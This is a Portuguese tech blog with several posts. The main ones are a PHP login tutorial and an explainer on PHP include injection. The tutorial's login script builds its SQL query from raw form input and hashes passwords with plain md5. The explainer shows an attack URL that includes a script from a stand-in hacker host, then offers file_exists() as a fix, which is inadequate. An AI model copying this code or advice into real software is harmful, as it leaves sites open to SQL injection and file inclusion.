Log da Selva

Olá pessoal

A muito tempo eu não postava no blog, como a maioria dos colaboradores dele, o único que tem atualizado o blog ultimamente é o Luã (obrigado por não deixar o blog falir), confesso que as vezes deixei de atualizar por preguiça, mais recentemente não o fiz por falta de tempo mesmo, agora voltando a postagem, essa semana sem muito o que fazer no trabalho eu estava navegando pelo site da revista info me deparei com esta matéria que fala sobre vendedores de eletrônicos que não sabem dizer qual a diferença da tv de plasma para a LCD, mais indicam as de LCD sem definir quais são as vantagens delas, eu também não sabia e pesquisando um pouco consegui descobrir alguns links e vou postar (os links, pois escrever ficaria muito grande e vocês teriam preguiça de ler) pra vocês por que eu acho que como eu, um grande número de pessoas não sabem a diferença, quanto a definição eu aprendi que a LCD consome menos energia, são mais caras e que não temos muitos tamanhos grandes atualmente, entre outras coisas, agora seguem os links:

Guia do Mercado Livre sobre qual comprar LCD ou Plasma.

LCD ou plasma, o que é melhor? (role um pouco a página [não seja preguiçoso] e vai achar sobre isso.)

Bom por enquanto é só, tentarei atualizar o blog todo dia, com pelo menos um post diário o que quer dizer que podem ser mais de um. ;P

Ajude a sustentar a Wikipédia e outros projetos, sem colocar a mão no bolso, e concorra a um Eee PC!
…e também a pen drives, card drives, camisetas geeks, livros e mais! O BR-Linux e o Efetividade lançaram uma campanha para ajudar a Wikimedia Foundation e outros mantenedores de projetos que usamos no dia-a-dia on-line. Se você puder doar diretamente, ou contribuir de outra forma, são sempre melhores opções. Mas se não puder, veja as regras da promoção e participe - quanto mais divulgação, maior será a doação do BR-Linux e do Efetividade, e você ainda concorre a diversos brindes!

Olá pessoal, como prometido estou aqui de volta (depois de muiiiiito tempo) para concluir nossas aula sobre o sistema de login php. Para conpensar o tempo que fiquei afastado do Log da Selva vou adiantar, além da aula 02, a aula 03. No mais, é isso pessoal, vamos ao que interessa !

Aula 02 - Formulário e script de login

:: Formulário de login

Antes de passarmos para o php iremos criar aquele famoso formulário de login (login - senha) no html. Ele terá basicamente a mesma estrutura do formulário de registro da primeira aula, porém só precisaremos dos campos “login” e “senha” para verificar se realmente aquele usuário que está tentando logar está cadastrado no nosso banco de dados.

obs.: os comentários no código são iniciados por // ou

Nosso formulário de login ficará assim então:

login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

<?php // recomendo iniciar sempre a session no começo da página para que não haja problemas com headers depois, mas por enquanto vocês nem precisam prestar atenção nisso, depois que pegaram o script de login vão entender melhor do que se trata isso aqui. 
session_start();
session_cache_expire(30);
session_cache_limiter('private');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>:: Login</title>
</head>
<body>
<h1>Login PHP</h1>
<?php // isso aqui vocês vão entender melhor depois que pegarem o script de login, então aconselho que nem percam tempo olhando isso agora
if ($_SESSION['result'] == 1) { // se a session de resultados tiver o valor 2...
	echo ("Erro: algum campo encontra-se vazio!"); // ele imprime algo negativo.
	}
if ($_SESSION['result'] == 2) { // se a session de resultados tiver o valor 2...
	echo ("Erro: usuário ou senha incorreto!"); // ele imprime algo negativo.
	}
?>
<form action="logando.php" method="post">
	Login:<br>
    <input name="login" type="text" /><br><!-- input é a tag de formatação de campo, ou seja, com ela você estará criando um campo com nome de login (indicado através do name) e o que for digitado dentro dele será do tipo texto. --> 
	Senha:<br> 
	<input name="senha" type="password" /><br><br><!-- o mesmo serve para o campo senha, a diferença é que o que for digitado nele será do tipo password, ou seja, no lugar de texto aparceção aquelas famosas bolinhas ou asteríscos. -->
	<input name="logar" type="submit" value="logar" /><br> <!-- aqui você cria um botão com a tag input indicando o tipo como submit, sendo assim, o que estiver dentro dos campos do formulário será submetido ao action do formulário (logando.php) através dele. No value você indica o texto que vai aparecer dentro do botão. -->
</form>  
</body>
</html>
<?php unset($_SESSION['result']); // retirando os valores da session  de resultados pra quando o usuário a atualizar a página o erro não continuar sendo impresso.?>

:: Script de login

O script de login consiste basicamente num algorítimo que pesquisa no banco de dados aquelas informações digitadas nos campos do formulário de login, geralmente: login e senha. Se alguma linha de registro no banco de dados for encotrada com o login e a senha requeridos um resultado positivo é exibido ao usuário ou então o mesmo é redirecionado para uma página exclusiva para usuários logados, caso contrário, exibi-se um resultado negativo ao mesmo.

Como foi indicado no formulário, o nosso script de login terá o nome de “logando”, aí vai ele:

logando.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
 
session_start();  // através dessa função podemos iniciar a manipulação de session que são variáveis globais,ou seja, a session é uma varíavel que pode ser utilizada em blocos de código distintos, por exemplo: aqui eu digo que a session de login é igual a "User", lá na minha página principal eu utilizo a $_session['login'] e ela terá esse valor que eu dei (User).
session_cache_expire(30); // define o limite de tempo do cache em 30 minutos 
session_cache_limiter('private'); // defini o limitador do cache para 'private'.
session_register('result');  // através dessa função registramos a session result que vai armazenar os resultados da nossa pesquisa.
 
//conectando com o banco de dados
$dbhost = "enderecodohost.com"; 
$dbuser = "tivira"; 
$dbsenha = "tivira"; 
$db = "logdaselva";
$conn = @mysql_connect($dbhost, $dbuser, $dbsenha) or die(mysql_error());
@mysql_select_db($db);
 
// agora vamos criar variáveis locais, também chamadas de variáveis de escopo
$login = $_POST['login']; // aqui estamos indicando aque a variável login ($login) recebe o que foi digitado no campo login do formulário através do método post.
$senha = md5($_POST['senha']); // o mesmo para senha, não esquecendo da incriptação md5.
 
if ((!$login) || (!$senha)) { // se não a variável login ou senha não recebeu nada...
	$_SESSION['result'] = 1;	 // ...a session de resultados recebe o valor 1...
	header("location:login.php"); // ...e redireciona o usuário para a página de login novamente, aonde será exibido ao mesmo um resultado negativo.
}else{ //caso contrário..
	$pesquisa = mysql_query("SELECT * FROM registros WHERE login = '$login' AND senha = '$senha'"); // aqui executamos na variável pesquisa ($pesquisa) uma query que seleciona todos os registros do nosso banco aonde o login e a senha são iguais ao que foi digitado pelo usuário.
	if (mysql_num_rows($pesquisa) > 0) { // se o número linhas de registro encontrados na variável for maior que 0, ou seja, se existir registro no banco com esse login e senha..
		session_register('login'); // criamos uma session login
		$_SESSION['login'] = $login; // indicamos seu valor, ela será igual ao valor do campo login digitado no formulário.
		header("location:principal.php"); // redirecionamos o usuário para uma página principal que validará o login do usuário.
	}else{ // caso contrário
		$_SESSION['result'] = 2; // indicamos o valor "2" para a variável de resultado..
		header("location:login.php"); // e redirecionamos o usuário para a página de login.
		} // fecha else
	} // fecha else
 
?>

Aula 03 - Validando o login

Validar um login consiste básicamente em perguntar na página principal se uma determinada session (a responsável pelo login) está setada, ou seja, se ela possui algum valor.

principal.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

<?php 
session_start(); // iniciando a session
session_cache_expire(30);
session_cache_limiter('private');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Principal</title>
</head>
<body>
<?php 
if (isset($_SESSION['login'])) { // se a ssssion login estiver setada..
	echo ("Bem vindo ".$_SESSION['login']."!"); // ele imprime um "bem vindo" com o nome do usuário.
}else{ // caso contrário..
	header("location:login.php"); // ele manda o usuário de volta pra página de login.
}
?>
</body>
</html>

Aqui vou encerrando nossas aulas à respeito do sistema de login, espero ter ajudado e esclarecido alguma coisa à vocês. Prometo que logo voltarei com novidades, grande abraço !
Dúvidas ?
Erros ?
Postem sem medo, obrigado! =)

Ja faz um tempinho que estou ligado nos padrões web. Procuro sempre aprender uma coisa ou outra e estar sempre nos conformes. Como ainda sou aprendiz, dou umas mancadas (e levo bronca do Luã xD) mas normalmente conserto depois.

Além das dicas que o Luã me da, tenho alguns sites que sempre me ajudam nos momentos mais difíceis. Um brushzinho aqui, uma fontezinha ali, um framework acolá… E de uns dias pra ca, tem um blog que ta sendo uma baita duma mão na roda.

Este é um post de utilidade pública… e digo utilidade porque eu nunca vi um site tão útil pra alguem que trabalha com web quanto o blog do Tyasske. Ele segue à risca os Padrões Web e ainda ajuda o pessoal com um bocado de dicas sobre tudo relacionado a webdevelopment.
Eu assinei o feed e procuro comentar nos posts mais úteis. Recomendo.

Tipo que nunca se deparou com uma situação de achar aquele progama que você tava procurando a tem medo que ele corrompa algum arquivo do seu sistema, ou qualquer outro arquivo do seu computador?

Bom a Microsoft criou uma ferramenta gratuita que emula maquinas virtuais, ao ponto de você ter varias maquinas com diferentes sistemas operacionais instalados, o que facilita tambem a vida de progamadores que precisa verificar a compatibiliade em varios sistemas. Para funcionarios de TI essa é uma excelente solução.

Uma caracteristica basica é que cada maquina funciona como se fosse um computador diferente, cada maquina usa seu próprio ip, seu proprio mac address, etc.

Está disponivel para download aqui.

Até hoje ainda existem páginas PHP com falhas de segurança em includes, o que possibilita uma ‘PHP Injection‘.

O que é isso?
Muitas páginas usam a QueryString da página pra setar qual página deve ser usada em um include no site, tornando o site mais dinâmico. Como essa:

http://www.narutounlimited.com/blog/index.php?page=downloads.html

Página PHP:

1
2
3

<?php
include($_GET[‘page‘]);
?>

O grande problema é que você nunca, nunca deve confiar nos dados vindos de um usuário. Em um código desprotegido, por exemplo, o usuário pode colocar uma URL externa, como essa:

http://www.narutounlimited.com/blog/index.php?page=http://www.h4×0rs.com/injection.php

E a URL externa será exibida no seu site.

Qual o perigo disso?
Imagina se o usuário mal intencionado incluir, em seu site, uma página que permita a ele executar comandos direto na linha de comando shell do seu servidor? Ele pode fazer praticamente o que quiser!

Como se proteger?
Existem diversas maneiras, e cada programador usa a sua. Eu costumo usar a função file_exists() pra verificar se o arquivo à ser incluido existe no servidor.

1
2
3
4
5

<?php
if (file_exists($_GET[‘page‘])) :
    include($_GET[‘page‘]);
endif;
?>

Simples e prático.

Dúvidas?

Quem não quer usar o novo Microsoft Windows Vista? Com todos akeles recursos graficos e muito mais. Ele é um ótimo sistema operacional e progamado para o conforto extremo do usuário.  Eu baixei ele e to usando, olha que meu pc eh bom e o v&¨*$ do windows deu-lhe uma nota de 3,7 para meu computador é mole?

Como saber se seu computador está apto a usar o windows vista? Qual versão se encaixaria melhor no meu computador? Bom aqui está a resposta para esse problema!

Windows vista advisor upgrade 1.0
Esse progama diz se seu computador tem a capacidade de usar o novo windows e ainda lhe recomenda uma versão.

Um programa que está dando uma boa ajuda à quem tem uma alta conta telefônica é o ADPHONE, basta criar uma conta e você pode ligar qualquer lugar do Brasil apenas com alguns cliques, e o melhor, é gratuito, porem a ligação dura em torno de 1:50 até 2:00 e por sua conta ser free você pode ligar apenas para telefone fixo, mas é claro você pode ficar ligando e ligando quantas vezes quiser quando a ligação cair. o.0 Isso ta salvando meu pescoço aqui em casa, acredite!

Baixe o programa nesse link!

BAIXE AGORA
Tirei isso do Baixenet

Ontem (30/05) aconteceu, aqui no Rio, no Hotal Gloria, o 9° Encontro Locaweb de Profissionais de Internet, e eu fui.

O evento foi bem legal, tinha bastante gente lá, e as palestras foram muito boas. O encerramento foi genial, com o Rafinha Bastos fazendo a galera rir toda hora.

E a Locaweb ainda vai devolver o valor da entrada em serviços, muito bom! (:

Concerteza não perderei os encontros nos anos seguintes.

Acabo de ler no jornal, que o Governo vai financiar Notebooks em acordo com o Banco do Brasil, Caixa Economica e outros, de até R$ 1.800,00.

Quando lí pensei, “É, deve ser bem popular mesmo, positivão…”. Acertei. Mas o PC é bom pra atividades básicas, bom mesmo, apesar dos 40gb de HD. 512mb de RAM, processador de 1,4ghz (suponho que seja celerom) e opção em gravador combo ou gravador de DVD.

Minha chance de comprar um!

Technorati Tags: notebook